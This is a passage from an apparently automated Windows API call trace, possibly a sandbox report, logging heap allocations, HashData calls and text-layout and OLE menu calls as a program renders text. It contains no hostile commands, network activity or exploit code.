lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0184.858] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.858] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.858] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.858] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83178 [0184.859] HashData (in: pbData=0x9f83178, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.859] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.859] HashData (in: pbData=0x9f8317c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.859] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83178 | out: hHeap=0x5e0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0184.859] HashData (in: pbData=0x9f82f68, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.859] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.859] HashData (in: pbData=0x9f82f6c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.859] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0184.859] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.860] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0184.860] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.860] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.860] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.860] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0184.860] HashData (in: pbData=0x9f82ed8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.860] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.860] HashData (in: pbData=0x9f82edc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.860] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0184.860] LsSetDoc () returned 0x0 [0184.860] LsCreateLine () returned 0x0 [0184.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.861] LsdnFinishRegular () returned 0x0 [0184.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.861] LsdnFinishRegular () returned 0x0 [0184.862] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.862] LsDisplayLine () returned 0x0 [0184.862] IOleInPlaceFrame:SetMenu (This=0xd90fe0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0184.862] IOleInPlaceFrame:SetMenu (This=0xd90fc0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0184.863] GetSysColor (nIndex=8) returned 0x0 [0184.863] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.863] GetSysColor (nIndex=8) returned 0x0 [0184.863] LsDestroyLine () returned 0x0 [0184.863] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0184.864] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0184.864] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0184.864] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0184.864] HashData (in: pbData=0x9f82fcc, cbData=0x4, pbHash=0x9f82fd0, cbHash=0x2 | out: pbHash=0x9f82fd0) returned 0x0 [0184.864] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.864] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.864] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.864] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.864] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.864] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.865] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.865] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.865] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.865] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.865] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.865] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0184.865] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0184.865] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.865] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.865] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.865] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0184.865] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0184.866] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0184.866] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e78 [0184.866] HashData (in: pbData=0x9f83044, cbData=0x4, pbHash=0x9f83048, cbHash=0x2 | out: pbHash=0x9f83048) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e78, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e7a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e8c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e94, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e96, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7e98, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7ea0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.866] HashData (in: pbData=0x6d7eac, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.866] HashData (in: pbData=0x6d7eb4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7ec0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.866] HashData (in: pbData=0x6d7ec4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.866] HashData (in: pbData=0x6d7ecc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.866] HashData (in: pbData=0x6d7ed8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e78 | out: hHeap=0x5e0000) returned 1 [0184.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0184.867] HashData (in: pbData=0x9ee6cc0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.867] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.867] HashData (in: pbData=0x9ee6cc4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0184.867] GetFocus () returned 0x103e2 [0184.867] GetFocus () returned 0x103e2 [0184.867] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0184.868] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0184.868] _CIsqrt () returned 0x407b027f [0184.868] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0184.868] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.868] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0184.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddcb8 [0184.869] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.869] HashData (in: pbData=0xd955f0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0184.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddcb8 | out: hHeap=0x5e0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0184.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0184.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0184.872] HashData (in: pbData=0x9f83104, cbData=0x4, pbHash=0x9f83108, cbHash=0x2 | out: pbHash=0x9f83108) returned 0x0 [0184.872] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.872] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.872] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.873] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0184.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0184.873] HashData (in: pbData=0x9ee6cc0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.873] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.873] HashData (in: pbData=0x9ee6cc4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0184.874] GetFocus () returned 0x103e2 [0184.874] GetFocus () returned 0x103e2 [0184.874] GetFocus () returned 0x103e2 [0184.874] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.874] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.874] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.874] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.874] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.874] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.876] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0184.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.877] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83148 [0184.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0184.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0184.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83148 | out: hHeap=0x5e0000) returned 1 [0184.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0184.881] LsSetDoc () returned 0x0 [0184.881] LsCreateLine () returned 0x0 [0184.882] LsDisplayLine () returned 0x0 [0184.886] LsDestroyLine () returned 0x0 [0184.886] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0184.888] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0184.888] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0184.888] HashData (in: pbData=0x9f82f6c, cbData=0x4, pbHash=0x9f82f70, cbHash=0x2 | out: pbHash=0x9f82f70) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c48, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c4a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c4c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c54, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c64, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c66, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c68, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c70, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c90, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c94, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.888] HashData (in: pbData=0x6d7c9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.888] HashData (in: pbData=0x6d7ca8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.889] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0184.889] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0184.889] HashData (in: pbData=0x9ee6cc0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.889] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.889] HashData (in: pbData=0x9ee6cc4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.889] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0184.889] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0184.889] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0184.889] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e78 [0184.889] HashData (in: pbData=0x9f830d4, cbData=0x4, pbHash=0x9f830d8, cbHash=0x2 | out: pbHash=0x9f830d8) returned 0x0 [0184.889] HashData (in: pbData=0x6d7e78, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.889] HashData (in: pbData=0x6d7e7a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e8c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e94, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e96, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7e98, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7ea0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.890] HashData (in: pbData=0x6d7eac, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.890] HashData (in: pbData=0x6d7eb4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7ec0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.890] HashData (in: pbData=0x6d7ec4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.890] HashData (in: pbData=0x6d7ecc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.890] HashData (in: pbData=0x6d7ed8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.890] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e78 | out: hHeap=0x5e0000) returned 1 [0184.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0184.891] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.891] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.891] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.891] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0184.892] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.892] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0184.892] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0184.892] _CIsqrt () returned 0x407b027f [0184.892] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0184.892] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0184.893] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddef8 [0184.893] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.893] HashData (in: pbData=0xd95650, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0184.895] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddef8 | out: hHeap=0x5e0000) returned 1 [0184.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0184.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0184.895] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0184.895] HashData (in: pbData=0x9f82ffc, cbData=0x4, pbHash=0x9f83000, cbHash=0x2 | out: pbHash=0x9f83000) returned 0x0 [0184.895] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.895] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.895] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.896] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.896] HashData (in: 